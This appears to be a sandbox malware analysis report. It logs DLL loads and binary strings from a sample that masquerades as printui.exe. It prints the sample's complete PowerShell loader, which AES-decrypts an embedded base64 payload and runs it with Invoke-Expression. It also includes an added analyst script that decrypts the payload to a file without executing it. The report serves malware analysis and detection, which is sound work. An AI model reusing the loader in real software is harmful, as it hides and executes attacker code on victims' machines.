    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: twext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cscui.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: workfoldersshell.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: ntshrui.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cscapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: shacct.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: idstore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: samlib.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wtsapi32.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: acppage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: aepic.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wlidprov.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: provsvc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositorycore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: ninput.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: ninput.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dui70.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: duser.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: thumbcache.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dataexchange.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: d3d11.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: dcomp.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.ui.fileexplorer.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: cldapi.dllJump to behavior
    Source: C:\Windows\explorer.exe | Section loaded: fltlib.dll
    Source: C:\Windows\explorer.exe | Section loaded: uiribbon.dll
    Source: C:\Windows\explorer.exe | Section loaded: xmllite.dll
    Source: C:\Windows\explorer.exe | Section loaded: atlthunk.dll
    Source: C:\Windows\explorer.exe | Section loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\explorer.exe | Section loaded: wkscli.dll
    Source: C:\Windows\explorer.exe | Section loaded: linkinfo.dll
    Source: C:\Windows\explorer.exe | Section loaded: windows.staterepositoryps.dll
    Source: C:\Windows\explorer.exe | Section loaded: windows.staterepositoryclient.dll
    Source: C:\Windows\explorer.exe | Section loaded: ntshrui.dll
    Source: C:\Windows\explorer.exe | Section loaded: cscapi.dll
    Source: C:\Windows\explorer.exe | Section loaded: structuredquery.dll
    Source: C:\Windows\explorer.exe | Section loaded: winmm.dll
    Source: C:\Windows\explorer.exe | Section loaded: apphelp.dll
    Source: C:\Windows\explorer.exe | Section loaded: ehstorshell.dll
    Source: C:\Windows\explorer.exe | Section loaded: cscui.dll
    Source: C:\Windows\explorer.exe | Section loaded: networkexplorer.dll
    Source: C:\Windows\explorer.exe | Section loaded: mrmcorer.dll
    Source: C:\Windows\explorer.exe | Section loaded: windows.staterepositorycore.dll
    Source: C:\Windows\explorer.exe | Section loaded: appxdeploymentclient.dll
    Source: C:\Windows\explorer.exe | Section loaded: bcp47mrm.dll
    Source: C:\Windows\explorer.exe | Section loaded: mrmdeploy.dll
    Source: C:\Windows\explorer.exe | Section loaded: appxdeploymentclient.dll
    Source: C:\Windows\explorer.exe | Section loaded: windows.ui.dll
    Source: C:\Windows\explorer.exe | Section loaded: windowmanagementapi.dll
    Source: C:\Windows\explorer.exe | Section loaded: inputhost.dll
    Source: C:\Windows\explorer.exe | Section loaded: policymanager.dll
    Source: C:\Windows\explorer.exe | Section loaded: msvcp110_win.dll
    Source: C:\Windows\explorer.exe | Section loaded: provsvc.dll
    Source: C:\Windows\System32\xcopy.exe | Section loaded: ulib.dll (logged twice)
    Source: C:\Windows\System32\xcopy.exe | Section loaded: ifsutil.dll (logged twice)
    Source: C:\Windows\System32\xcopy.exe | Section loaded: devobj.dll (logged twice)
    Source: C:\Windows\System32\xcopy.exe | Section loaded: fsutilext.dll (logged twice)
    Source: C:\Windows\System32\xcopy.exe | Section loaded: ntmarta.dll (logged twice)
    Source: C:\Windows \System32\printui.exe | Section loaded: uxtheme.dll
    Source: C:\Windows \System32\printui.exe | Section loaded: printui.dll
    Source: C:\Windows \System32\printui.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\System32\OpenWith.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
    Source: F.7z | Static file information: File size 77248657 > 1048576
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: console_zero.exe, 00000033.00000002.2225221333.00007FFA33147000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdbGG source: usvc.dat.31.dr
    Source: Binary string: vcruntime140d.amd64.pdb source: vcruntime140d.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: vcruntime140d.amd64.pdb,,, source: vcruntime140d.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: console_zero.exe, 00000033.00000002.2226266010.00007FFA5112F000.00000002.00000001.01000000.0000001A.sdmp, zlib1.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: svchost.exe, 0000002E.00000002.2378540668.00007FFA243AB000.00000002.00000001.01000000.0000001B.sdmp, libcrypto-3-x64.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdb source: usvc.dat.31.dr
    Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: svchost.exe, 0000002E.00000002.2389293768.00007FFA2CF18000.00000002.00000001.01000000.00000017.sdmp, libpq.dll.31.dr
    Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: svchost.exe, 0000002E.00000002.2389293768.00007FFA2CF18000.00000002.00000001.01000000.00000017.sdmp, libpq.dll.31.dr
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: console_zero.exe, 00000033.00000002.2226266010.00007FFA5112F000.00000002.00000001.01000000.0000001A.sdmp, zlib1.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: svchost.exe, 0000002E.00000002.2387227676.00007FFA2CEB0000.00000002.00000001.01000000.00000018.sdmp, libssl-3-x64.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: ucrtbased.pdb source: ucrtbased.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: PrintUI.pdb source: xcopy.exe, 00000019.00000002.1799318566.000001A4BEA1C000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000001B.00000000.1832292058.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe, 0000001F.00000002.2221772024.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe.25.dr
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: svchost.exe, 0000002E.00000002.2387227676.00007FFA2CEB0000.00000002.00000001.01000000.00000018.sdmp, libssl-3-x64.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: PrintUI.pdbGCTL source: xcopy.exe, 00000019.00000002.1799318566.000001A4BEA1C000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000001B.00000000.1832292058.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe, 0000001F.00000002.2221772024.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe.25.dr

    Data Obfuscation

    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB
    Source: C:\Windows \System32\printui.exe | Process created: "C:\Windows\System32\cmd.exe" /c powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;" (identical entry logged twice)
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;" (identical entry logged twice)
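The process creation entries above carry the complete stage-two loader: the AES key and IV as inline byte literals, the ciphertext as base64, and Invoke-Expression on whatever comes out. The script below is an added triage helper, not code from the report or from the sample. It pulls those three literals out of a captured command line and performs the same decryption the sample does (.NET Aes defaults, AES-CBC with PKCS7 padding, key and IV set explicitly), but writes the plaintext to a file and hashes it instead of executing it. The function names and the regular expressions are mine, and the regexes assume this loader's variable names ($b64, $ky, $vv). The report does not show what the plaintext contains; treat the output as attacker code to read, never to run.

```powershell
# Added analyst tooling for the loader logged above (not from the report or the sample).
# Re-implements the sample's decrypt step with the same .NET Aes defaults (CBC, PKCS7),
# but returns/writes the plaintext rather than passing it to Invoke-Expression.

function ConvertFrom-HexByteList {
    # "0x1E, 0x5B, ..." (the inside of a [byte[]](...) literal) -> byte[]
    param([Parameter(Mandatory)][string]$Literal)
    [byte[]]($Literal -split ',' | ForEach-Object { [Convert]::ToByte($_.Trim(), 16) })
}

function Invoke-LoaderDecrypt {
    param(
        [Parameter(Mandatory)][string]$CommandLine,                    # the logged command line
        [string]$OutFile = (Join-Path $PWD 'decrypted_stage.ps1.txt')  # .txt so nothing runs it by accident
    )
    # Regexes assume this loader's variable names: $b64 (ciphertext), $ky (key), $vv (IV).
    if (-not ($CommandLine -match "\`$b64\s*=\s*'([A-Za-z0-9+/=]+)'"))      { throw 'ciphertext literal not found' }
    $cipherText = $Matches[1]
    if (-not ($CommandLine -match "\`$ky\s*=\s*\[byte\[\]\]\(([^)]+)\)"))   { throw 'key literal not found' }
    $key = ConvertFrom-HexByteList $Matches[1]
    if (-not ($CommandLine -match "\`$vv\s*=\s*\[byte\[\]\]\(([^)]+)\)"))   { throw 'IV literal not found' }
    $iv = ConvertFrom-HexByteList $Matches[1]
    if (($key.Length -notin @(16, 24, 32)) -or ($iv.Length -ne 16)) {
        throw "unexpected key/IV length: $($key.Length)/$($iv.Length)"
    }

    $aes = [System.Security.Cryptography.Aes]::Create()   # CBC + PKCS7 by default, as in the sample
    $aes.Key = $key
    $aes.IV  = $iv
    $cipherBytes = [Convert]::FromBase64String($cipherText)
    $plainBytes  = $aes.CreateDecryptor().TransformFinalBlock($cipherBytes, 0, $cipherBytes.Length)
    $aes.Dispose()

    # Hash the recovered stage so it can be tracked as an indicator in its own right.
    $sha256 = [System.Security.Cryptography.SHA256]::Create()
    $hash = ($sha256.ComputeHash($plainBytes) | ForEach-Object { $_.ToString('x2') }) -join ''

    [System.IO.File]::WriteAllBytes($OutFile, $plainBytes)
    [pscustomobject]@{
        CipherBytes = $cipherBytes.Length
        PlainBytes  = $plainBytes.Length
        Sha256      = $hash
        OutFile     = $OutFile
        Text        = [System.Text.Encoding]::UTF8.GetString($plainBytes)
    }
}

# Literals copied from the process creation entries above; the tail is kept so the
# regexes see the real shape of the command line.
$logged = @'
$b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;
'@

Invoke-LoaderDecrypt -CommandLine $logged | Format-List
```

The 192-character base64 string decodes to 144 bytes, a whole number of 16-byte blocks, which is consistent with CBC and PKCS7 padding; a padding exception from TransformFinalBlock would mean the key, IV or ciphertext was transcribed wrongly. The same function works on the command line as captured by Sysmon event 1 or 4688 logging, which is where this loader shape (inline key, inline IV, FromBase64String, Invoke-Expression) is most cheaply detected.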
    Source: C:\Windows\System32\console_zero.exe | Code function: 51_2_00007FFA3312B470 WSAStartup,WSACleanup,GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,GetSystemDirectoryW,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,QueryPerformanceFrequency | 51_2_00007FFA3312B470
    Source: x249569.dat.16.dr | Static PE information: section name: _RDATA
    Source: x249569.dat.16.dr | Static PE information: section name: .fptable
    Source: x249569.dat.26.dr | Static PE information: section name: _RDATA
    Source: x249569.dat.26.dr | Static PE information: section name: .fptable
    Source: console_zero.exe.31.dr | Static PE information: section name: .fptable
    Source: vcruntime140d.dll.31.dr | Static PE information: section name: _RDATA
    Source: libiconv-2.dll.31.dr | Static PE information: section name: .xdata
    Source: libiconv-2.dll.31.dr | Static PE information: section name: /4
